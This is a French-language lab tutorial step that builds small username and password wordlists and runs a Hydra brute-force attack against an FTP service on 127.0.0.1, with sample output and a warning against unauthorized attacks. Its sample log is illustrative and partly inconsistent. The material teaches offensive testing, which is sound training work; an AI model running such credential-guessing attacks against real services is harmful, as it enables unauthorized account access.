Créer une liste d'utilisateurs :
Dans votre répertoire ~/project
, créez un fichier nommé users.txt
contenant une liste d'utilisateurs, un utilisateur par ligne. Par exemple :
nano ~/project/users.txt
Ajoutez les utilisateurs suivants :
user1
user2
user3
Enregistrez le fichier et quittez nano
(Ctrl+X, Y, Entrée).
Créer une liste de mots de passe :
Dans votre répertoire ~/project
, créez un fichier nommé passwords.txt
contenant une liste de mots de passe, un mot de passe par ligne. Par exemple :
nano ~/project/passwords.txt
Ajoutez les mots de passe suivants :
password123
password
123456
Enregistrez le fichier et quittez nano
(Ctrl+X, Y, Entrée).
Exécuter l'attaque FTP sans sortie verbeuse :
Maintenant, exécutons l'attaque Hydra contre un serveur FTP cible. À des fins de démonstration, nous utiliserons une cible factice 127.0.0.1
. Important : N'essayez pas d'attaquer des systèmes sans autorisation explicite.
Exécutez la commande suivante :
hydra -L ~/project/users.txt -P ~/project/passwords.txt ftp://127.0.0.1
-L ~/project/users.txt
: Spécifie le fichier de la liste d'utilisateurs.
-P ~/project/passwords.txt
: Spécifie le fichier de la liste de mots de passe.
ftp://127.0.0.1
: Spécifie le service FTP et l'adresse du serveur cible.
Remarque : Étant donné qu'aucun serveur FTP n'est en cours d'exécution sur 127.0.0.1
, l'attaque échouera. Cependant, cette commande démontre la syntaxe de base pour exécuter une attaque FTP sans sortie verbeuse. Hydra tentera chaque combinaison d'utilisateur et de mot de passe, mais il n'affichera les résultats que si une connexion réussie est trouvée. Si aucune connexion réussie n'est trouvée, il affichera un message indiquant qu'aucun mot de passe n'a été craqué.
La sortie ressemblera à ceci (bien que probablement avec des messages "Login failed" car il n'y a pas de serveur FTP réel) :
Hydra v9.5 (c) 2023 by van Hauser/THC - Use freely but carefully.
Hydra starting at 2023-10-27 10:00:00
[DATA] 1 task, 3 login attempts per task, 3 password attempts per task
[DATA] attacking ftp://127.0.0.1:21
[STATUS] 0.00 tries/min, 0 tries in 0 min, 1 task
[STATUS] 0.00 tries/min, 0 tries in 0 min, 1 task
...
[ATTEMPT] target 127.0.0.1 - login: user3 password: 123456
[STATUS] 0.00 tries/min, 0 tries in 0 min, 1 task
[ERROR] 127.0.0.1: FTP: Login failed
[ATTEMPT] target 127.0.0.1 - login: user1 password: password123
[STATUS] 0.00 tries/min, 0 tries in 0 min, 1 task
[ERROR] 127.0.0.1: FTP: Login failed
...
[ATTEMPT] target 127.0.0.1 - login: user3 password: password123
[STATUS] 0.00 tries/min, 0 tries in 0 min, 1 task
[ERROR] 127.0.0.1: FTP: Login failed
[ATTEMPT] target 127.0.0.1 - login: user2 password: password
[STATUS] 0.00 tries/min, 0 tries in 0 min, 1 task
[ERROR] 127.0.0.1: FTP: Login failed
...
[STATUS] 0 of 9 tasks completed, 1 task remaining
Hydra finished.
Si une connexion réussie était trouvée, la sortie inclurait une ligne comme :
[21][ftp] host: 127.0.0.1 login: user1 password: password123
Étant donné que nous n'exécutons pas de serveur FTP réel, l'attaque échouera et Hydra indiquera qu'aucun mot de passe n'a été craqué. Cela est prévu.